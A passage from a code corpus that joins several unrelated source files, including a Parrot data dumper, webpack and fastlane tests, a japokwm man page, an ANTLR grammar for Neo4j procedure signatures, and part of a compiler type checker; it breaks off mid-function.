if ret goto DUMP
#is _dump undef?
func = "genericUndef"
$I0 = defined _dump
unless $I0 goto DUMP
func = "pmcDefault"
$I0 = isa _dump, "Object"
if $I0 goto DUMP
TEST_GENERIC:
# does a generic helper method exist?
func = "genericHash"
$I0 = does _dump, "hash"
if $I0 goto DUMP
func = "genericArray"
$I0 = does _dump, "array"
if $I0 goto DUMP
func = "genericString"
$I0 = does _dump, "string"
if $I0 goto DUMP
func = "genericNumber"
$I0 = does _dump, "boolean"
if $I0 goto DUMP
$I0 = does _dump, "integer"
if $I0 goto DUMP
$I0 = does _dump, "float"
if $I0 goto DUMP
# no, dump as a unknown PMC
set func, "pmcDefault"
DUMP:
ret = self.func( name, _dump )
unless ret goto END
self."dumpProperties"( name, _dump )
END:
.return ( 1 )
.end
=back
=head1 AUTHOR
Jens Rieks E<lt>parrot at jensbeimsurfen dot deE<gt> is the author
and maintainer.
Please send patches and suggestions to the Perl 6 Internals mailing list.
=head1 COPYRIGHT
Copyright (C) 2004-2008, Parrot Foundation.
=cut
# Local Variables:
# mode: pir
# fill-column: 100
# End:
# vim: expandtab shiftwidth=4 ft=pir:
| Parrot Internal Representation | 4 | winnit-myself/Wifie | runtime/parrot/library/Data/Dumper/Base.pir | [
"Artistic-2.0"
] |
"use strict";
require("./helpers/warmup-webpack");
const path = require("path");
const webpack = require("..");
const { createFsFromVolume, Volume } = require("memfs");
describe("Watch", () => {
jest.setTimeout(10000);
it("should only compile a single time", done => {
let counterBeforeCompile = 0;
let counterDone = 0;
let counterHandler = 0;
const compiler = webpack(
{
context: path.resolve(__dirname, "fixtures/watch"),
watch: true,
mode: "development",
snapshot: {
managedPaths: [/^(.+?[\\/]node_modules[\\/])/]
},
experiments: {
futureDefaults: true
},
module: {
// unsafeCache: false,
rules: [
{
test: /\.js$/,
use: "some-loader"
}
]
},
plugins: [
c => {
c.hooks.beforeCompile.tap("test", () => {
counterBeforeCompile++;
});
c.hooks.done.tap("test", () => {
counterDone++;
});
}
]
},
(err, stats) => {
if (err) return done(err);
if (stats.hasErrors()) return done(new Error(stats.toString()));
counterHandler++;
}
);
compiler.outputFileSystem = createFsFromVolume(new Volume());
setTimeout(() => {
expect(counterBeforeCompile).toBe(1);
expect(counterDone).toBe(1);
expect(counterHandler).toBe(1);
compiler.close(done);
}, 5000);
});
});
| JavaScript | 4 | fourstash/webpack | test/Watch.test.js | [
"MIT"
] |
describe Fastlane do
describe Fastlane::FastFile do
describe "set_changelog" do
context 'with invalid platform' do
let(:invalidPlatform_lane) { "lane :test do set_changelog(app_identifier: 'x.y.z', platform: 'whatever', changelog: 'custom changelog', username: 'name@example.com') end" }
it 'raises a Fastlane error' do
expect { Fastlane::FastFile.new.parse(invalidPlatform_lane).runner.execute(:test) }.to(
raise_error(FastlaneCore::Interface::FastlaneError) do |error|
expect(error.message).to match(/Invalid platform 'whatever', must be ios, appletvos, mac/)
end
)
end
end
context 'with invalid app_identifier' do
let(:validPlatform_lane) { "lane :test do set_changelog(app_identifier: 'x.y.z', platform: 'ios', changelog: 'custom changelog', username: 'name@example.com') end" }
it 'raises a Fastlane error' do
allow(Spaceship::ConnectAPI).to receive(:login).and_return(true)
allow(Spaceship::ConnectAPI).to receive(:select_team).and_return(true)
allow(Spaceship::ConnectAPI::App).to receive(:find).and_return(nil)
expect { Fastlane::FastFile.new.parse(validPlatform_lane).runner.execute(:test) }.to(
raise_error(FastlaneCore::Interface::FastlaneError) do |error|
expect(error.message).to match(/Couldn't find app with identifier x.y.z/)
end
)
end
end
end
end
end
| Ruby | 4 | flufff42/fastlane | fastlane/spec/actions_specs/set_changelog_spec.rb | [
"MIT"
] |
japokwm(5)
# NAME
japokwm - tiling made easy
# DESCRIPTION
A japokwm configuration file is a lua file that is executed by japokwm. You can
use built-in functions with it to change the behavior of your window manager and
change various settings. An example config is likely present in
/etc/japokwm/init.lua for you to check out.
# Terminology
*container* ++
an array consisting of 4 floats where they represent the relative x, y, ++
width and height respectively ++
*relative x/y/width/height* ++
when x = 0 you are at the left side of the screen. At x = 1 you are on ++
the right side. At x = 0.5 you are at half the screen ++
when width = 0 it is literally 0. When it is 1 it is as wide as the ++
current monitor. When width = 0.5 it means half the width of the monitor ++
*root*
everything you see when you don't have a window open
*window* ++
the container and the content you see in it
# Types
Here are types listed which are used in Japokwm's config file. Those Types are
important because you won't understand the function definitions otherwise.
[[ *Types*
:< *Description*
:< *Example*
| nil
:< basic lua nil
:< nil
| string
:< basic lua string
:< "string"
| number
:< basic lua number
:< 3.5
| integer
:< basic lua number that must be a whole number
:< 3
| function
:< basic lua number that must be a whole number
:< function() print("execute") end
| boolean
:< basic lua boolean
:< true | false
| direction
:< an exist
:< true | false
In Japokwm multiple types of tables are used to different kinds of information.
We gave those special tables certain names so that you can tell them apart more
easily. To show the content of a table we write one as follows:
```
table(string: string, string: integer, ...)
```
This table consists out of elements consisting out of keys of type string and a
value of type string and elements consisting out of keys of type string and
values of type integers which can exist anywhere between 0 and infinity times
denoted by "..."
Tables without keys are called arrays and are denoted as follows:
```
array(string, integer, ...)
```
This is an array with a string, then an integer followed by any number of
integers
[[ *Types*
:< *Description*
:< *Example*
| container
:< array(number, number, number, number) where each number represents x, y,
width or height in the given order
:< {0.3, 0.1, 0.5, 0.7}
| layout_data_element
:< array(container, ...)
:< {{0.3, 0.1, 0.5, 0.7}, {0.3, 0.1, 0.5, 0.7},}
| layout_data
:< array(layout_data_element, ...) where the first layout_data_element will be
used
:< { { {0.3, 0.1, 0.5, 0.7}, {0.3, 0.1, 0.5, 0.7}, }, { {0.3, 0.1, 0.5, 0.7}, {0.3, 0.1, 0.5, 0.7},} }
| layout_info
:< array(string) The 1st argument represents the directory/name of the layout
:< {"main"} -- the directory/name is "main"
| color
:< array(number, number, number, number) the arguments represents rgba
respectively between 0..1
:< {0, 1, 1, 1} -- cyan
| keybinding
:< array(string, function()) the arguments are the keys given by the string ++
and the function representing the action that will be taken
:< {"M-S-e", function() print("test") end}
| rule
:< array(string, string, function(n)) the arguments are class name and rule ++
respectively. The class and name are obtained from the window and the rule ++
is just a function that gets the container id. The function will be ++
executed when the layout is rearrange.
:< {"anki", "", function() print("test") end}
| monrule
:< array(string, function()) the arguments are name and rule
respectively. The class and name are obtained from the window and the rule is
just a function without arguments. The function will be executed
when a layout is created.
:< {"", function() print("test") end}
# NAMESPACES
[[ *Namespace*
:[ *Description*
| action
: Execute an action
| config
: Configure certain properties or the behavior of the window manager
| container
: Configure certain properties or the behavior of a container
| event
: Bind a function to an event
| layout
: Configure certain properties or the behavior of a layout
| l
: Configure things locally to the layout
# EVENTS
[[ *Event name*
:[ *when*
:[ *signature*
:[ *Description*
| on_start
: once when the windowmanager starts
: void function()
:
| on_focus
: when a new window is focused
: void function(int i)
: i: container id
| on_update
: when the state of the layout is updated
: void function(int i)
: i: count of containers
| on_create_container
: when a container is created
: void function(int i)
: i: container id
# ACTION
*arrange()* ++
Arrange containers to the given information
*create_output()* ++
just create another output
*decrease_nmaster()* ++
decrease the number of master windows
*exec(cmd)* ++
execute a shell command in a new pid ++
<where> ++
cmd: string - the command
*focus_container(i)* ++
focus the container at i ++
<where> ++
i: integer - position on the stack
*focus_on_hidden_stack(i)* ++
replace current container with a hidden container ++
<where> ++
i: integer - relative position on the hidden stack
*focus_on_stack(i)* ++
focuses the container at relative i ++
<where> ++
i: integer - relative position on the stack
*increase_nmaster()* ++
increase the number of master windows
*kill(i)* ++
kill the window at position i
<where> ++
i: integer - position on the stack
*load_layout(l)* ++
load a layout ++
<where> ++
l: string - represents the layout name
*load_layout_in_set(set, i: position)* ++
load a layout in the layout set ++
<where> ++
set: string - the name of the set ++
i: the layout
*load_next_layout_in_set(set)* ++
load the next layout in the layout set ++
<where> ++
set: the name of the set
*load_prev_layout_in_set(set)* ++
load the previous layout in the layout set ++
<where> ++
set: string - the name of the set
*move_container_to_workspace(i)* ++
move the selected container to the workspace i ++
<where> ++
i: integer
*move_resize(e)* ++
move and resize the selected container to the mouse ++
<where> ++
e: enum - given by info.cursor.mode
*move_to_scratchpad(i)* ++
move the window at position i to the scratchpad
<where> ++
i: integer - position on the stack
*quit()* ++
quit the window manager
*repush(i, j)* ++
push the container into the master area ++
<where> ++
i: integer - container that needs to repushed ++
j: integer - new position it will be pushed to
*resize_main(n)* ++
resize the master area ++
<where> ++
n: number - relative size (between 0 and 1)
*set_floating(b)* ++
set the selected container's floating status ++
<where> ++
b: boolean - status(true/false)
*set_nmaster(i)*
set the amount of master windows ++
<where> ++
i: integer - the number of master windows
*show_scratchpad()*
show the first window on the scratchpad. If it is already visible hide it
instead and move it to the end of the scratchpad.
*swap_workspace(i, i2)*
swap the workspace i with the workspace i2 ++
<where> ++
i: integer - workspace at i ++
i2: integer - workspace at i2
*tag_view(i)*
tag a view
<where> ++
i: integer - an integer representing a binary number where each digit
represents a workspace that will be toggled
*toggle_bars()* ++
toggles layer_shell bars
*toggle_floating()* ++
toggles if current container is floating
*toggle_layout()* ++
toggle previous layout
*toggle_workspace()* ++
toggle previous workspace
*view(i)* ++
view the ith workspace ++
<where> ++
i: integer - ith workspace
*zoom()* ++
like dwm's zoom
# CONTAINER
*container_set_alpha(i, alpha)* ++
set the opacity of the container ++
<where> ++
i: integer - position of the container
alpha: float - new alpha value of the container
*container_set_ratio(i, ratio)* ++
set the ratio of the container ++
<where> ++
i: integer - position of the container
ratio: float - ratio of the container (if 0 it is interpreted as no ratio)
*container_set_sticky(i, sticky)* ++
make container sticky ++
<where> ++
i: integer - position of the container
sticky: integer - should represent the binary number for the workspaces to
set it sticky to. If it is 0 the container will be moved to the scratchpad
# EVENT
*add_listener(event_name, func)* ++
add a add_listener to an event ++
<where> ++
event_name: string - identifier of the event ++
func: function(n) - the function that will be called on event specified by event_name ++
<where> ++
n: integer - n represents the amount of containers
# LAYOUT
*set(layout_data)* ++
set layout ++
<where> ++
layout_data: layout_data - layout_data for the layout
# INFO
*get_active_layout()* ++
get the name of the layout currently active on the selected workspace
<return> ++
string - name of the layout
*get_this_container_count()* ++
get the amount of visible containers in this workspace
<return> ++
integer - number of containers
*this_container_position()* ++
get the position the container is at ++
<return> ++
integer - position of the focused container
*get_nmaster()* ++
get the number of master windows ++
<return> ++
integer - number of master windows
*get_previous_layout()* ++
get the name of the layout previously active on the selected workspace
<return> ++
string - name of the layout
*get_root_area()* ++
get the root area
<return> ++
table(x, y, width, height) ++
<where> ++
x: integer - x coordinate ++
y: integer - y coordinate ++
width: integer - width of the root area ++
height: integer - height of the root area
*get_next_empty_workspace()* ++
Get next workspaces not used by any window
<return> ++
integer - workspace id of this empty workspace
*get_workspace()* ++
Get the workspaces id of the current workspace
<return> ++
integer - workspace id
*get_container_under_cursor()* ++
get the container beneath the cursor ++
<return> ++
integer - container id
*get_n_tiled()* ++
get the amount of containers currently visible ++
<return> ++
integer - amount of containers
*is_container_not_in_limit()* ++
returns whether a container doesn't violate min/max_width/height of the
constraints ++
<return> ++
boolean - whether it is in limit
*is_container_not_in_master_limit()* ++
returns whether a container doesn't violate min/max_width/height of the ++
master constraints ++
<return> ++
boolean - whether it is in limit
*stack_position_to_position(i)* ++
converts a position on the container stack to a position
<where> ++
i - the position of the container on the container stack
<return> ++
i - the position of the container
# CONFIG
*add_mon_rule(rule)*
add a rule for monitors
<where> ++
rule: rule -
*add_rule(rule)*
add a rule for containers
<where> ++
rule: rule -
*bind_key(bind, func)*
bind a keybinding to a lua function
<where> ++
bind: keybinding - the binding that will execute the function
func: function() - the function that will be executed
*create_layout_set(name, layouts)*
create a new layout_set ++
<where> ++
name: string - name of the layout set ++
layouts: layout_info - layouts that belong to this set
*create_workspaces(names)*
create or recreate all workspaces with an array of names for each ++
workspace. The order of the workspace can be set by prefixing the names ++
with: "%i:" where %i represents the position the workspace will be on. ++
<where> ++
names: array(string)
*reload()* ++
reload the config file
*set_arrange_by_focus(b)* ++
if b is true windows will be tiled by means of the focus stack
<where> ++
b: boolean
*set_automatic_workspace_naming(b)* ++
if b is true workspaces will be automatically to the app-id of the focused
container on on that particular workspace
<where> ++
b: boolean
*set_border_color(color)* ++
set the border color of windows ++
<where> ++
color: color
*set_default_layout(l)* ++
set the default layout ++
<where> ++
l: string - name/directory of the layout
*set_float_borderpx(f)* ++
set the border width of floating windows in pixel ++
<where> ++
f: border width in pixel
*set_focus_color(color)* ++
set the color of the focused window ++
<where> ++
color: color
*set_focus_color(color)* ++
set the color of the focused window ++
<where> ++
color: color
*set_hidden_edges(d)* ++
set the directions edge borders will be hidden ++
<where> ++
d: direction
*set_layout_constraints(min_width: a, max_width: b, min_height: c, max_height: d)* ++
Set the minimum and maximum dimensions of resizing any window ++
<where> ++
a, b, c, d: number - relative width/height
*set_master_constraints(min_width: a, max_width: b, min_height: c, max_height: d)* ++
Set the minimum and maximum dimensions of resizing the master area ++
<where> ++
a, b, c, d: number - relative width/height
*set_master_layout_data(data)* ++
set the way the windows in the master area are tiled depending on nmaster ++
<where> ++
data: layout_data
*set_mod(i)* ++
set the modifier which is any number between 1 and 4. This causes the ++
"mod" string to be replaced such that they correspond to the correct ++
modifiers:
[[ Number
:< Mod
:< Literally
|< 1
:< Alt
:< "Alt_L"
|< 2
:< Number lock
:< "Num_Lock"
|< 3
:< AltGr
:< "ISO_Level3_Shift"
|< 4
:< Super
:< "Super_L"
<where> ++
i: integer
*set_outer_gaps(i)* ++
set how large the gap between all the windows and the root is ++
<where> ++
i: integer - the size of those gaps in pixel
*set_repeat_delay(i)* ++
how long do you need to wait before the keyboard starts to repeat in ++
<where> ++
i: integer - i is the delay given in milliseconds
*set_repeat_rate(i)* ++
how often will a character repeat ++
<where> ++
i: integer - i is the repeat rate given in milliseconds
*set_resize_data(data)*
set the resize direction of the layout ++
; TODO improve this
<where> ++
data: array(array(integer, ...))
*set_resize_direction(d)* ++
set the resize direction of the layout ++
<where> ++
d: direction
*set_resize_function(func)* ++
the function that handles resizing windows in a layout
<where> ++
func: function(layout_data, o_layout_data, resize_data, n, direction) - the
function that will be called when you resize your containers ++
<where> ++
layout_data: layout_data - the data for the current layout ++
o_layout_data: layout_data - the layout how it originally was ++
resize_data: array(array(integer, ...)) - which layout_data_elements to
include when resizing ++
n: float - how much it should resize ++
direction: direction - which directions to resize to
*set_combo_timeout(timout)* ++
set timeout for keyboard combos ++
<where> ++
timout: integer
*set_root_color(color)* ++
set color of the root ++
<where> ++
color: color
*set_sloppy_focus(b)* ++
set whether to use sloppy focus or not. If sloppy focus is activated you ++
will focus windows by hovering above them. ++
<where> ++
b: boolean
*set_smart_hidden_edges(b)* ++
if true edges are only hidden (see set_hidden_edges) if the number of ++
containers in the current workspace <= 1 ++
<where> ++
b: boolean
*set_tile_borderpx(i)* ++
set the border width of tiled windows in pixel ++
<where> ++
i: integer - border width in pixel
# MONITOR
*set_scale(n)* ++
scale the monitor by n
<where> ++
n: number - the percentage the monitor will be scaled e.g. 1 = 100%
*set_transform(e)* ++
scale the monitor by n
<where> ++
% TODO: what is this enum?
e: WL_LIST_TRANSFORMATION - an enum provided by info.monitor.transform
# LOCAL
config beginning with l are considered local config and only apply for the
current layout. There are basically the same functions as usual but only some of
them can be used locally. Here is a list of available functions:
## CONFIG
set_arrange_by_focus ++
set_border_color ++
set_float_borderpx ++
set_focus_color ++
set_hidden_edges ++
set_inner_gaps ++
set_layout_constraints ++
set_master_constraints ++
set_master_layout_data ++
set_outer_gaps ++
set_resize_data ++
set_resize_direction ++
set_resize_function ++
set_sloppy_focus ++
set_smart_hidden_edges ++
set_tile_borderpx
## EVENT
add_listener
# SEE ALSO
*japokwm*(1)
| SuperCollider | 5 | werererer/Japokwm | man/japokwm.5.scd | [
"BSD-2-Clause"
] |
grammar Signature;
procedure: namespace? name '(' (parameter',')*(parameter)? ')' '::' results ;
function: namespace? name '(' (parameter',')*(parameter)? ')' '::' (type | '(' type ')');
results: empty | '(' (result',')*(result) ')' ;
parameter: name ('=' defaultValue)? '::' type ;
result: name '::' type ;
namespace: (name'.')+ ;
name: IDENTIFIER | QUOTED_IDENTIFIER ;
empty: 'VOID' ;
type: opt_type | list_type ;
defaultValue: value;
list_type: 'LIST''?'?' OF '+opt_type ;
opt_type: base_type'?'? ;
base_type: 'MAP' | 'ANY' | 'NODE' | 'REL' | 'RELATIONSHIP' | 'EDGE' | 'PATH' | 'NUMBER' | 'LONG' | 'INT' | 'INTEGER' | 'FLOAT' | 'DOUBLE' | 'BOOL' | 'BOOLEAN' | 'DATE' | 'TIME' | 'LOCALTIME' | 'DATETIME' | 'LOCALDATETIME' | 'DURATION' | 'POINT' | 'GEO' | 'GEOMETRY' | 'STRING' | 'TEXT' ;
NEWLINE: [\r\n]+ ;
QUOTED_IDENTIFIER: '`' [^`]+? '`' ;
IDENTIFIER: [a-zA-Z_][a-zA-Z0-9_]+ ;
WS: [ \t\r\n]+ -> skip ;
value: nullValue | INT_VALUE | FLOAT_VALUE | boolValue | mapValue | listValue | stringValue;
INT_VALUE: [0-9]+;
FLOAT_VALUE: ([0-9]+'.'[0-9]+) | 'NaN';
boolValue: 'true'|'false';
stringValue: QUOTED_STRING_VALUE | PLAIN_STRING_VALUE;
QUOTED_STRING_VALUE: '"'[^"]+?'"';
PLAIN_STRING_VALUE: .+?;
nullValue: 'null';
listValue: '[' ((value',')*value)?']';
mapValue: '{' (((name ':' value)',')*(name ':' value) | ((name '=' value)',')*(name '=' value))? '}';
| ANTLR | 3 | alexwoolford/neo4j-apoc-procedures | core/src/main/antlr/apoc/custom/Signature.g4 | [
"Apache-2.0"
] |
TypeChecker {
badNamespaceHere(c TypeCheckerContext, e Node, ns Namespace) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Namespace is not valid here: {}", ns.toString())))
}
badTypeHere(c TypeCheckerContext, e Node, ti Namespace) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Type is not valid here: {}", ti.toString())))
}
badTagHere(c TypeCheckerContext, e Node, tag Tag) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Type is not valid here: {}", tag.toString())))
}
badLocalVar(c TypeCheckerContext, name string, err Node) {
c.errors.add(Error.at(c.unit, RangeFinder.find(err), format("Variable is already defined: {}", name)))
}
badUnaryOp(c TypeCheckerContext, op Token, at Tag) {
c.errors.add(Error.at(c.unit, op.span, format("Unary operator {} cannot be applied to expression of type {}", op.value, at.toString())))
}
badBinaryOp(c TypeCheckerContext, op Token, lhs Tag, rhs Tag) {
c.errors.add(Error.at(c.unit, op.span, format("Binary operator {} cannot be applied to expressions of type {} and {}", op.value, lhs.toString(), rhs.toString())))
}
badConversion(c TypeCheckerContext, e Node, from Tag, to Tag) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Cannot convert {} to {}", from.toString(), to.toString())))
}
badArg(c TypeCheckerContext, e Node, from Tag, to Tag) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Cannot convert {} to {}", from.toString(), to.toString())))
}
badImplicitArg(c TypeCheckerContext, e Node, from Tag, to Tag) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Cannot convert implicit argument of type {} to {}", from.toString(), to.toString())))
}
badTypeArgs(c TypeCheckerContext, e Node, expected int, actual int) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Expected {} type args but got {} type args", expected, actual)))
}
badArgs(c TypeCheckerContext, e Node, expected int, actual int) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), format("Expected {} args but got {} args", expected, actual)))
}
badTypeArgInference(c TypeCheckerContext, e Node) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), "The type arguments could not be inferred; specify them explicitly"))
}
redundantCast(c TypeCheckerContext, e Node) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), "Cast is redundant"))
}
findTypeParamByNameOrNull(typeParamList List<Namespace>, name string) {
for tp in typeParamList {
if tp.name == name {
return tp
}
}
return null
}
findTypeParamIndex(typeParamList List<Namespace>, tp Namespace) {
for it, i in typeParamList {
if it == tp {
return i
}
}
return -1
}
getPtrTag(c TypeCheckerContext, tag Tag, ptrCount int) {
for i := 0; i < ptrCount {
tag = getSingleArgTag(c.tags.ptrTi, tag)
}
return tag
}
getSingleArgTag(ti Namespace, arg Tag) {
args := new Array<Tag>(1)
args[0] = arg
return Tag { ti: ti, args: args }
}
closeTag(tag Tag, tps List<Namespace>, ta Array<Tag>) Tag {
if tag.ti != null && (tag.ti.flags & TypeFlags.typeParam) != 0 {
tpi := findTypeParamIndex(tps, tag.ti)
return ta[tpi]
}
if tag.args == null {
return tag
}
return Tag { ti: tag.ti, args: closeTagArgs(tag.args, tps, ta) }
}
closeTagArgs(args Array<Tag>, tps List<Namespace>, ta Array<Tag>) Array<Tag> {
i := 0
while i < args.count {
a := args[i]
closed := closeTag(a, tps, ta)
if !Tag.equals(a, closed) {
break
}
i += 1
}
if i == args.count {
return args
}
newArgs := new Array<Tag>(args.count)
to := i
while i < to {
newArgs[i] = args[i]
i += 1
}
while i < args.count {
newArgs[i] = closeTag(args[i], tps, ta)
i += 1
}
return newArgs
}
assign(c TypeCheckerContext, tag Tag, e Node, dest Tag) {
if tag.ti == null || dest.ti == null {
return true
}
if Tag.equals(tag, dest) {
return true
}
if tag.ti == Tag.null_.ti && (dest.ti.flags & TypeFlags.anyPointer) != 0 {
return true
}
if canCoerce(c, tag, e, dest) {
return true
}
return false
}
assignMatch(c TypeCheckerContext, tag Tag, e Node, dest Tag, top bool, tps List<Namespace>, ta Array<Tag>) bool {
if tag.ti == null || dest.ti == null {
return true
}
if (dest.ti.flags & TypeFlags.typeParam) != 0 {
tpi := findTypeParamIndex(tps, dest.ti)
assert(tpi >= 0)
if ta[tpi].ti != null {
if ta[tpi].ti == Tag.null_.ti && (tag.ti.flags & TypeFlags.anyPointer) != 0 {
ta[tpi] = tag
return true
}
dest = ta[tpi]
} else {
ta[tpi] = tag
return true
}
}
if tag.ti == dest.ti {
if tag.args != null || dest.args != null {
if tag.args.count != dest.args.count {
return false
}
for a, i in tag.args {
if !assignMatch(c, a, null, dest.args[i], false, tps, ta) {
return false
}
}
}
return true
}
if tag.ti == Tag.null_.ti && (dest.ti.flags & TypeFlags.anyPointer) != 0 {
return true
}
if top && canCoerce(c, tag, e, dest) {
return true
}
return false
}
canCoerce(c TypeCheckerContext, tag Tag, e Node, dest Tag) {
if (dest.ti.flags & TypeFlags.boolval) != 0 {
return (tag.ti.flags & TypeFlags.boolval) != 0
}
if (dest.ti.flags & TypeFlags.cstring_) != 0 {
return e.is(StringExpression)
}
if (dest.ti.flags & TypeFlags.floatval) != 0 {
if (tag.ti.flags & TypeFlags.intval) != 0 {
return true
}
if (tag.ti.flags & TypeFlags.floatval) != 0 && dest.ti.rank >= tag.ti.rank {
return true
}
return false
}
if (dest.ti.flags & TypeFlags.unsigned) != 0 {
if (tag.ti.flags & TypeFlags.intval) == 0 {
return false
}
if (tag.ti.flags & TypeFlags.unsigned) != 0 && dest.ti.rank >= tag.ti.rank {
return true
}
if e.is(NumberExpression) && tag.ti == c.tags.int_.ti {
num := e.as(NumberExpression)
return transmute(num.opaqueValue, long) >= 0 && canFitUnsigned(num.opaqueValue, dest)
}
return false
}
if (dest.ti.flags & TypeFlags.intval) != 0 {
if (tag.ti.flags & TypeFlags.intval) == 0 {
return false
}
if (tag.ti.flags & TypeFlags.unsigned) == 0 && dest.ti.rank > tag.ti.rank {
return true
}
if e.is(NumberExpression) && tag.ti == c.tags.int_.ti {
num := e.as(NumberExpression)
return canFitSigned(transmute(num.opaqueValue, long), dest)
}
return false
}
if dest.ti.taggedPointerOptions != null {
return (tag.ti.flags & TypeFlags.anyPointer) != 0 && dest.ti.taggedPointerOptions.contains(tag)
}
return false
}
unify(c TypeCheckerContext, a Tag, ax Node, b Tag, bx Node, err Node) {
if a.ti == null {
return b
}
if b.ti == null {
return a
}
if Tag.equals(a, b) {
return a
}
if a.ti == Tag.null_.ti && (b.ti.flags & TypeFlags.anyPointer) != 0 {
return b
}
if b.ti == Tag.null_.ti && (a.ti.flags & TypeFlags.anyPointer) != 0 {
return a
}
if a.ti.taggedPointerOptions != null && (b.ti.flags & TypeFlags.anyPointerExceptTaggedPointer) != 0 && a.ti.taggedPointerOptions.contains(b) {
return a
}
if b.ti.taggedPointerOptions != null && (a.ti.flags & TypeFlags.anyPointerExceptTaggedPointer) != 0 && b.ti.taggedPointerOptions.contains(a) {
return b
}
tag := tryUnifyNumbers(c.tags, a, ax, b, bx)
if tag.ti != null {
return tag
}
c.errors.add(Error.at(c.unit, RangeFinder.find(err), format("Cannot unify {} and {}", a.toString(), b.toString())))
return a
}
tryUnifyNumbers(t CommonTags, a Tag, ax Node, b Tag, bx Node) {
if (a.ti.flags & TypeFlags.floatval) != 0 || (b.ti.flags & TypeFlags.floatval) != 0 {
return (a.ti == t.double_.ti || b.ti == t.double_.ti) ? t.double_ : t.float_
}
return tryUnifyIntvals(t, a, ax, b, bx)
}
tryUnifyIntvals(t CommonTags, a Tag, ax Node, b Tag, bx Node) {
if (a.ti.flags & TypeFlags.intval) == 0 || (b.ti.flags & TypeFlags.intval) == 0 {
return Tag{}
}
if (a.ti.flags & TypeFlags.unsigned) != 0 {
if (b.ti.flags & TypeFlags.unsigned) != 0 {
if a.ti.rank >= b.ti.rank {
return a.ti.rank >= 4 ? a : t.int_
} else {
return b.ti.rank >= 4 ? b : t.int_
}
} else {
if b.ti.rank == 6 {
if a.ti.rank < 4 {
return b
}
} else if a.ti.rank < b.ti.rank {
return b.ti.rank >= 4 ? b : t.int_
} else if a.ti.rank < 4 {
return t.int_
}
}
} else {
if (b.ti.flags & TypeFlags.unsigned) != 0 {
if a.ti.rank == 6 {
if b.ti.rank < 4 {
return a
}
} else if b.ti.rank < a.ti.rank {
return a.ti.rank >= 4 ? a : t.int_
} else if b.ti.rank < 4 {
return t.int_
}
} else {
if a.ti.rank >= b.ti.rank {
return a.ti.rank >= 4 ? a : t.int_
} else {
return b.ti.rank >= 4 ? b : t.int_
}
}
}
if b.ti == t.int_.ti && bx.is(NumberExpression) {
if (a.ti.flags & TypeFlags.unsigned) != 0 {
if transmute(bx.as(NumberExpression).opaqueValue, long) >= 0 && canFitUnsigned(bx.as(NumberExpression).opaqueValue, a) {
return a
}
} else {
if canFitSigned(transmute(bx.as(NumberExpression).opaqueValue, long), a) {
return a
}
}
}
if a.ti == t.int_.ti && ax.is(NumberExpression) {
if (b.ti.flags & TypeFlags.unsigned) != 0 {
if transmute(ax.as(NumberExpression).opaqueValue, long) >= 0 && canFitUnsigned(ax.as(NumberExpression).opaqueValue, b) {
return b
}
} else {
if canFitSigned(transmute(ax.as(NumberExpression).opaqueValue, long), b) {
return b
}
}
}
return Tag{}
}
canApplyCompareEqualsOperator(c TypeCheckerContext, a Tag, ax Node, b Tag, bx Node) {
if Tag.equals(a, b) {
return true
}
if a.ti == Tag.null_.ti && (b.ti.flags & TypeFlags.anyPointer) != 0 {
return true
}
if b.ti == Tag.null_.ti && (a.ti.flags & TypeFlags.anyPointer) != 0 {
return true
}
tag := tryUnifyIntvals(c.tags, a, ax, b, bx)
if tag.ti != null {
return true
}
if a.ti.taggedPointerOptions != null && (b.ti.flags & TypeFlags.anyPointerExceptTaggedPointer) != 0 && a.ti.taggedPointerOptions.contains(b) {
return true
}
if b.ti.taggedPointerOptions != null && (a.ti.flags & TypeFlags.anyPointerExceptTaggedPointer) != 0 && b.ti.taggedPointerOptions.contains(a) {
return true
}
if (a.ti.flags & TypeFlags.enum_) != 0 && (b.ti == c.tags.int_.ti || b.ti == c.tags.uint_.ti) && bx.is(NumberExpression) && bx.as(NumberExpression).tag.ti == b.ti && bx.as(NumberExpression).opaqueValue == 0 {
return true
}
if (b.ti.flags & TypeFlags.enum_) != 0 && (a.ti == c.tags.int_.ti || a.ti == c.tags.uint_.ti) && ax.is(NumberExpression) && ax.as(NumberExpression).tag.ti == a.ti && ax.as(NumberExpression).opaqueValue == 0 {
return true
}
return false
}
canApplyCompareOrderedOperator(c TypeCheckerContext, a Tag, ax Node, b Tag, bx Node) {
tag := tryUnifyNumbers(c.tags, a, ax, b, bx)
if tag.ti != null {
return true
}
if (a.ti.flags & TypeFlags.string_) != 0 && (b.ti.flags & TypeFlags.string_) != 0 {
return true
}
if (a.ti.flags & TypeFlags.pointer_) != 0 && (b.ti.flags & TypeFlags.pointer_) != 0 {
return true
}
if a.ti == c.tags.char_.ti && b.ti == c.tags.char_.ti {
return true
}
return false
}
applyBinaryOperator(c TypeCheckerContext, op string, a Tag, ax Node, b Tag, bx Node, err Token) {
if a.ti == null || b.ti == null {
return Tag{}
}
tag := Tag{}
if op == "+" {
if (a.ti.flags & TypeFlags.anyNumber) != 0 && (b.ti.flags & TypeFlags.anyNumber) != 0 {
tag = tryUnifyNumbers(c.tags, a, ax, b, bx)
} else if a.ti == c.tags.pointer_.ti && (b.ti.flags & TypeFlags.intval) != 0 {
tag = c.tags.pointer_
} else if (a.ti.flags & TypeFlags.intval) != 0 && b.ti == c.tags.pointer_.ti {
tag = c.tags.pointer_
} else if a.ti == c.tags.char_.ti && (b.ti.flags & TypeFlags.intval) != 0 {
tag = c.tags.char_
} else if (a.ti.flags & TypeFlags.intval) != 0 && b.ti == c.tags.char_.ti {
tag = c.tags.char_
}
} else if op == "-" {
if (a.ti.flags & TypeFlags.anyNumber) != 0 && (b.ti.flags & TypeFlags.anyNumber) != 0 {
tag = tryUnifyNumbers(c.tags, a, ax, b, bx)
} else if a.ti == c.tags.pointer_.ti && (b.ti.flags & TypeFlags.intval) != 0 {
tag = c.tags.pointer_
} else if (a.ti.flags & TypeFlags.intval) != 0 && b.ti == c.tags.pointer_.ti {
tag = c.tags.pointer_
